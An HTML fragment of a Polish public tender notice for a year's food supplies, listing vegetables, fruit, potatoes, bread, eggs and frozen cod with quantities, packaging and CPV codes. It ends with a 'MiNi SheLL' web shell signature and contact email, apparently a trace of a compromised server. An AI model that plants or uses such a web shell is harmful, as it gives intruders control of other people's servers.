<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Burak czerwony	
Ilość na 12 m-cy: 2400 kg
opis: Worek 10 kg	kg
2. Cebula
Ilość na 12 m-cy: 200 kg
opis: Worek 5 kg
jednostka miary: kg
3. Czosnek
Ilość na 12 m-cy: 	6 kg
opis: Worek 1 kg
jednostka miary: kg
4. Fasola Jaś
Ilość na 12 m-cy: 140 kg
opis: Woreczek 400 g
jednostka miary: kg
5. Jabłka
Ilość na 12 m-cy: 1000 kg
opis: Skrzynka 15 kg, jabłko o wadze 100g szt.
jednostka miary: kg
6. Kapusta biała
Ilość na 12 m-cy: 1600 kg
opis: Worek 25 kg
jednostka miary: kg
7. Kapusta czerwona
Ilość na 12 m-cy: 400 kg
opis: Worek 25 kg
jednostka miary: kg
8. Kapusta kiszona
Ilość na 12 m-cy: 500 kg
opis: Woreczek foliowy 1 kg
jednostka miary: kg
9. Kalafior - sezon
Ilość na 12 m-cy: 600 szt.
opis: Skrzynka 10 szt.
jednostka miary: Szt.
10. Koper 
Ilość na 12 m-cy: 1200 pęczków
opis: Pęczki po 10 szt.
jednostka miary: pęczek
11. Marchew 
Ilość na 12 m-cy: 8000 kg
opis: Worek 10 kg, płukana, bez śladów piachu i brudu
jednostka miary: kg
12. Natka pietruszki
 Ilość na 12 m-cy: 740 pęczków
opis: Pęczek po 10 szt.
jednostka miary: pęczek
13. Ogórek zielony - sezon
Ilość na 12 m-cy: 400 kg
opis: Worek 10 kg
jednostka miary: kg
14. Ogórek zielony poza sezonem
Ilość na 12 m-cy: 200 kg
opis: Luz
jednostka miary: kg
15. Ogórek kiszony	
Ilość na 12 m-cy: 500 kg
opis: Woreczek foliowy 0,5 kg
jednostka miary: kg
16. Pietruszka - korzeń
Ilość na 12 m-cy: 500 kg
opis: Worek 5 kg, płukana, bez śladów piachu i brudu
jednostka miary: kg
17. Pomidor - sezon
Ilość na 12 m-cy: 800 kg
opis: Skrzynka 5 kg
jednostka miary: kg
18. Rzodkiew biała
Ilość na 12 m-cy: 400 kg
opis: Skrzynka 10 kg
jednostka miary: kg
19. Seler
 Ilość na 12 m-cy: 1400 kg
opis: Worek 5 kg, płukany, bez śladów piachu i brudu
jednostka miary: kg
20. Sałata - sezon
Ilość na 12 m-cy: 705 szt.
opis: Skrzynka 15 szt.
jednostka miary: Szt.
21. Szczypior 
Ilość na 12 m-cy: 400 pęczków
opis: Pęczek po 10 szt.
jednostka miary: pęczek
22. Groch łuskany
Ilość na 12 m-cy: 100 
opis: torebek po 500 g
jednostka miary: Szt.
23. Pomidor poza sezonem
Ilość na 12 m-cy: 	500 kg
opis: Skrzynka 15 kg, pomidor okrągły o wadze 100 g za 1 szt.
jednostka miary: kg
24. Gruszka
Ilość na 12 m-cy: 70 kg
opis: Skrzynka 10 kg
jednostka miary: kg
25. Banan
Ilość na 12 m-cy: 70 kg
opis: Karton 18 kg
jednostka miary: kg
26. Por
Ilość na 12 m-cy: 	150 kg
opis: Luz
jednostka miary: kg
27. Brokuły
Ilość na 12 m-cy: 250 szt.
opis: Skrzynka 10 szt.
jednostka miary: Szt.
28. Brukselka
Ilość na 12 m-cy: 400 kg
opis: Worek po 2,5 kg
jednostka miary: kg
29. Rzodkiewka
 Ilość na 12 m-cy: 540 pęczków
opis: Pęczek po 10 szt.
jednostka miary: pęczek
30. Pomarańcza
Ilość na 12 m-cy: 	70 kg
opis: Siatka 2 kg
jednostka miary: kg
31. Pieczarka sezon/poza sezonem
Ilość na 12 m-cy: 100 kg
opis: Skrzynka 5 kg
jednostka miary: kg
32. Mandarynka sezon
Ilość na 12 m-cy: 600 kg
opis: Siatka 2 kg
jednostka miary: kg
33. Papryka (asortyment: żółta, czerwona, zielona) sezon
Ilość na 12 m-cy: 80 kg
opis: Luz
jednostka miary: Kg
34. Papryka (asortyment: żółta, czerwona, zielona) poza sezonem
Ilość na 12 m-cy: 50 kg
opis: Luz
jednostka miary: kg
35. Kapusta pekińska
Ilość na 12 m-cy: 150 kg
opis: luz
jednostka miary: kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 03.22.22.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ziemniaki 
ilość na 12 m-cy: 36 000 kg
opis: Worek 15 kg
2. Ziemniaki młode sezon
ilość na 12 m-cy: 12 000 kg
opis: Worek 15 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bułka
ilość na 12 m-cy: 23 400 szt.
opis: Bułka krojona, opakowanie termiczne pokrywające wyrób, waga 400g, kształt podłużny, wyraźny podział na kromki o jednakowej długości, skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
2. Chleb
 ilość na 12 m-cy: 9000 szt.
opis: Chleb krojony, opakowanie termiczne pokrywające wyrób, waga 600g, kształt podłużny, wyraźny podział na kromki o jednakowej długości. Skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
3. Chleb razowy
ilość na 12 m-cy: 9000 szt.
opis: Chleb krojony, opakowanie termiczne pokrywające wyrób, waga 500g, kształt podłużny, wyraźny podział na kromki o jednakowej długości. Skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
4. Bułka tarta
ilość na 12 m-cy: 170 kg
opis: Opakowanie 1 kg. Barwa od szarokremowej do złocistej, postać sypka bez grudek, zapach swoisty bez obcych zapachów, smak charakterystyczny dla suszonego pieczywa bez obcych posmaków, wilgotność nie więcej niż 10%, zawartość cukru w suchej masie nie więcej niż 5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajko
ilość na 12 m-cy: 35 000 szt.
opis: Rozmiar M 53-63 g. Pakowane w wytłaczanki po 10 szt. Klasa 1A. szczegółowe znakowanie opakowania zbiorczego (data ważności, klasa wagowa, rozmiar). Pojedyncze sztuki oznakowane pieczątką producenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Ryby mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona dorsz - filet bez skóry, bez glazury SHP
ilość na 12 m-cy: 1000 kg
opis: Tafla 7 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com